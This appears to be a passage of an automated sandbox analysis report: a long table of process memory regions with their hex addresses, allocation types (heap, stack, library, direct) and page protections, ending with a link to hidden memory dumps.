page read and write
|
||
C40000
|
unkown
|
page read and write
|
||
63C4C7E000
|
stack
|
page read and write
|
||
7FFD9BDC0000
|
trusted library allocation
|
page read and write
|
||
1F43A28C000
|
heap
|
page read and write
|
||
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
A61000
|
unkown
|
page execute read
|
||
1F43A530000
|
heap
|
page read and write
|
||
1F1E8230000
|
heap
|
page read and write
|
||
1F4201F5000
|
heap
|
page read and write
|
||
C6E000
|
unkown
|
page read and write
|
||
53825FE000
|
stack
|
page read and write
|
||
1F1E98D3000
|
trusted library allocation
|
page read and write
|
||
A1E68FD000
|
stack
|
page read and write
|
||
7FFD9BDC0000
|
trusted library allocation
|
page read and write
|
||
208469A2000
|
heap
|
page read and write
|
||
7FFD9B7AC000
|
trusted library allocation
|
page execute and read and write
|
||
63C4D7D000
|
stack
|
page read and write
|
||
200853B8000
|
trusted library allocation
|
page read and write
|
||
208468F5000
|
heap
|
page read and write
|
||
7FFD9B994000
|
trusted library allocation
|
page read and write
|
||
C46000
|
unkown
|
page read and write
|
||
1F181C3F000
|
trusted library allocation
|
page read and write
|
||
20085B64000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB36000
|
trusted library allocation
|
page read and write
|
||
1F1EA130000
|
heap
|
page read and write
|
||
7FFD9BD16000
|
trusted library allocation
|
page read and write
|
||
20860903000
|
heap
|
page read and write
|
||
A1E687E000
|
stack
|
page read and write
|
||
1DC8500D000
|
trusted library allocation
|
page read and write
|
||
200835E8000
|
heap
|
page read and write
|
||
20848CEA000
|
trusted library allocation
|
page read and write
|
||
6F743FE000
|
stack
|
page read and write
|
||
1DC9D2E3000
|
heap
|
page read and write
|
||
1DCA68FB000
|
heap
|
page read and write
|
||
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
||
166A7881000
|
direct allocation
|
page read and write
|
||
7FFD9BA36000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD0A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD50000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
1DCA9147000
|
trusted library allocation
|
page read and write
|
||
20848BF3000
|
trusted library allocation
|
page read and write
|
||
C00005F000
|
direct allocation
|
page read and write
|
||
1DCA6949000
|
heap
|
page read and write
|
||
B2A000
|
unkown
|
page readonly
|
||
1DC9D0E0000
|
heap
|
page read and write
|
||
7FFD9BD38000
|
trusted library allocation
|
page read and write
|
||
C000082000
|
direct allocation
|
page read and write
|
||
1F1EA050000
|
heap
|
page read and write
|
||
7FFD9BD68000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD23000
|
trusted library allocation
|
page read and write
|
||
20083665000
|
heap
|
page read and write
|
||
2009D6D0000
|
heap
|
page read and write
|
||
7FFD9BCF4000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD65000
|
trusted library allocation
|
page read and write
|
||
2009542A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B3000
|
trusted library allocation
|
page execute and read and write
|
||
1F41FF80000
|
heap
|
page read and write
|
||
7FFD9BD20000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA66000
|
trusted library allocation
|
page execute and read and write
|
||
C000116000
|
direct allocation
|
page read and write
|
||
63C4B7E000
|
stack
|
page read and write
|
||
200853E7000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD8E000
|
trusted library allocation
|
page read and write
|
||
208482B0000
|
heap
|
page read and write
|
||
20085E43000
|
trusted library allocation
|
page read and write
|
||
1DCA94FA000
|
trusted library allocation
|
page read and write
|
||
7FFD9BDA0000
|
trusted library allocation
|
page read and write
|
||
20083500000
|
heap
|
page read and write
|
||
C0000A6000
|
direct allocation
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
C00010C000
|
direct allocation
|
page read and write
|
||
7FFD9BA3C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
C25DEBF000
|
stack
|
page read and write
|
||
1F42203D000
|
trusted library allocation
|
page read and write
|
||
63C4AFF000
|
stack
|
page read and write
|
||
C000118000
|
direct allocation
|
page read and write
|
||
21FF53E000
|
stack
|
page read and write
|
||
208487D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BDB0000
|
trusted library allocation
|
page read and write
|
||
1F1EA17F000
|
heap
|
page read and write
|
||
1DCA8864000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
C0000D8000
|
direct allocation
|
page read and write
|
||
1DCA918C000
|
trusted library allocation
|
page read and write
|
||
63C47EE000
|
stack
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BCDB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
1F42211D000
|
trusted library allocation
|
page read and write
|
||
1DCA6946000
|
heap
|
page read and write
|
||
21FF639000
|
stack
|
page read and write
|
||
1DCA691B000
|
heap
|
page read and write
|
||
1F4220A6000
|
trusted library allocation
|
page read and write
|
||
C000064000
|
direct allocation
|
page read and write
|
||
1DCA8BB3000
|
trusted library allocation
|
page read and write
|
||
53827FD000
|
stack
|
page read and write
|
||
208587C5000
|
trusted library allocation
|
page read and write
|
||
C000006000
|
direct allocation
|
page read and write
|
||
20860B22000
|
heap
|
page read and write
|
||
1DC859CE000
|
trusted library allocation
|
page read and write
|
||
5382A3F000
|
stack
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
2084883D000
|
trusted library allocation
|
page read and write
|
||
21FF7B8000
|
stack
|
page read and write
|
||
2086094B000
|
heap
|
page read and write
|
||
1DC831B4000
|
heap
|
page read and write
|
||
6F73CFF000
|
stack
|
page read and write
|
||
208608AA000
|
heap
|
page read and write
|
||
63C507E000
|
stack
|
page read and write
|
||
1F420127000
|
heap
|
page read and write
|
||
21FF4F9000
|
stack
|
page read and write
|
||
20083663000
|
heap
|
page read and write
|
||
20848741000
|
trusted library allocation
|
page read and write
|
||
208609C0000
|
heap
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
C0000A0000
|
direct allocation
|
page read and write
|
||
7FFD9BDD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
C000020000
|
direct allocation
|
page read and write
|
||
1F422021000
|
trusted library allocation
|
page read and write
|
||
1F1E7F10000
|
heap
|
page read and write
|
||
538370D000
|
stack
|
page read and write
|
||
7FFD9BD3F000
|
trusted library allocation
|
page read and write
|
||
20085581000
|
trusted library allocation
|
page read and write
|
||
21FF2FD000
|
stack
|
page read and write
|
||
7FFD9BD0F000
|
trusted library allocation
|
page read and write
|
||
2008362A000
|
heap
|
page read and write
|
||
1F42205E000
|
trusted library allocation
|
page read and write
|
||
1DC84F01000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
C73000
|
unkown
|
page write copy
|
||
C000030000
|
direct allocation
|
page read and write
|
||
2009D7BC000
|
heap
|
page read and write
|
||
C25DFBE000
|
stack
|
page read and write
|
||
7FFD9BCF9000
|
trusted library allocation
|
page read and write
|
||
C0000C6000
|
direct allocation
|
page read and write
|
||
7FFD9BD6F000
|
trusted library allocation
|
page read and write
|
||
1F421B4A000
|
heap
|
page read and write
|
||
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
1DC84F86000
|
trusted library allocation
|
page read and write
|
||
1DCC0A55000
|
heap
|
page read and write
|
||
C000045000
|
direct allocation
|
page read and write
|
||
7FFD9BD76000
|
trusted library allocation
|
page read and write
|
||
1DCA6901000
|
heap
|
page read and write
|
||
7FFD9BD44000
|
trusted library allocation
|
page read and write
|
||
20848C66000
|
trusted library allocation
|
page read and write
|
||
1DC8500B000
|
trusted library allocation
|
page read and write
|
||
1DCA8310000
|
heap
|
page execute and read and write
|
||
C000094000
|
direct allocation
|
page read and write
|
||
C00003A000
|
direct allocation
|
page read and write
|
||
2009541C000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
1F432094000
|
trusted library allocation
|
page read and write
|
||
1DCC0810000
|
heap
|
page read and write
|
||
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
1F421B45000
|
heap
|
page read and write
|
||
20085806000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCDB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCF2000
|
trusted library allocation
|
page read and write
|
||
C25DD37000
|
stack
|
page read and write
|
||
1DC9D129000
|
heap
|
page read and write
|
||
1F1E7F8E000
|
heap
|
page read and write
|
||
1DC84F5F000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB2F000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCD8000
|
trusted library allocation
|
page read and write
|
||
21FF83E000
|
stack
|
page read and write
|
||
1DC84A60000
|
trusted library allocation
|
page read and write
|
||
63C517E000
|
stack
|
page read and write
|
||
1F1E7FAE000
|
heap
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
C73000
|
unkown
|
page write copy
|
||
1F181C3B000
|
trusted library allocation
|
page read and write
|
||
7FFD9B753000
|
trusted library allocation
|
page execute and read and write
|
||
208491C4000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB3A000
|
trusted library allocation
|
page read and write
|
||
200853EA000
|
trusted library allocation
|
page read and write
|
||
1DCA878A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
7FFD9BADA000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9DC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
20848CE8000
|
trusted library allocation
|
page read and write
|
||
C0000D0000
|
direct allocation
|
page read and write
|
||
7FFD9BD63000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
1F422126000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD2A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9AB000
|
trusted library allocation
|
page read and write
|
||
1F1EA160000
|
heap
|
page read and write
|
||
1DCA8300000
|
heap
|
page execute and read and write
|
||
1DCA8280000
|
heap
|
page execute and read and write
|
||
1F4200DE000
|
heap
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BD0A000
|
trusted library allocation
|
page read and write
|
||
1F1901B8000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
1F43A020000
|
heap
|
page read and write
|
||
7FFD9BCE6000
|
trusted library allocation
|
page read and write
|
||
2008361C000
|
heap
|
page read and write
|
||
1F43A120000
|
heap
|
page execute and read and write
|
||
1F432031000
|
trusted library allocation
|
page read and write
|
||
20860B24000
|
heap
|
page read and write
|
||
2086085C000
|
heap
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
63C47A2000
|
stack
|
page read and write
|
||
1DC83080000
|
heap
|
page read and write
|
||
200854F4000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD05000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD38000
|
trusted library allocation
|
page read and write
|
||
2009D52C000
|
heap
|
page read and write
|
||
2009D4C3000
|
heap
|
page read and write
|
||
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
1DCA69F0000
|
heap
|
page readonly
|
||
6F73C7E000
|
stack
|
page read and write
|
||
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
20083590000
|
trusted library allocation
|
page read and write
|
||
1F180089000
|
trusted library allocation
|
page read and write
|
||
1F1E7F70000
|
heap
|
page read and write
|
||
1F4200DC000
|
heap
|
page read and write
|
||
538277E000
|
stack
|
page read and write
|
||
1DCA8804000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page execute and read and write
|
||
1DC84A70000
|
heap
|
page read and write
|
||
20085DD8000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCF4000
|
trusted library allocation
|
page read and write
|
||
C0000A4000
|
direct allocation
|
page read and write
|
||
2009D4E0000
|
heap
|
page read and write
|
||
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
1DC84A85000
|
heap
|
page read and write
|
||
C000100000
|
direct allocation
|
page read and write
|
||
1DCA9145000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB52000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
20085E2B000
|
trusted library allocation
|
page read and write
|
||
6F73D7E000
|
stack
|
page read and write
|
||
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
C000098000
|
direct allocation
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
1F1E9FDF000
|
heap
|
page read and write
|
||
20083606000
|
heap
|
page read and write
|
||
6F7427E000
|
stack
|
page read and write
|
||
C00004E000
|
direct allocation
|
page read and write
|
||
2009D819000
|
heap
|
page read and write
|
||
1F43A2B3000
|
heap
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
5382B3B000
|
stack
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
2008363C000
|
heap
|
page read and write
|
||
21FF6BF000
|
stack
|
page read and write
|
||
21FF97E000
|
stack
|
page read and write
|
||
20846900000
|
heap
|
page read and write
|
||
C25EB0D000
|
stack
|
page read and write
|
||
1DC85ABE000
|
trusted library allocation
|
page read and write
|
||
1DC9D080000
|
heap
|
page execute and read and write
|
||
7FFD9BD1C000
|
trusted library allocation
|
page read and write
|
||
1F43A07E000
|
heap
|
page read and write
|
||
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
1DC94F83000
|
trusted library allocation
|
page read and write
|
||
1DCA6880000
|
heap
|
page read and write
|
||
7FFD9BA96000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD23000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBC3000
|
trusted library allocation
|
page read and write
|
||
1F422069000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B98D000
|
trusted library allocation
|
page execute and read and write
|
||
208469E8000
|
heap
|
page read and write
|
||
1F1EA19A000
|
heap
|
page read and write
|
||
1DC85001000
|
trusted library allocation
|
page read and write
|
||
200854A7000
|
trusted library allocation
|
page read and write
|
||
1F4201FE000
|
heap
|
page read and write
|
||
7FFD9BD55000
|
trusted library allocation
|
page read and write
|
||
C00012E000
|
direct allocation
|
page read and write
|
||
1F1E7FB8000
|
heap
|
page read and write
|
||
2084888E000
|
trusted library allocation
|
page read and write
|
||
1F1E9F10000
|
heap
|
page read and write
|
||
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
C000066000
|
direct allocation
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
There are 1179 hidden memdumps, click here to show them.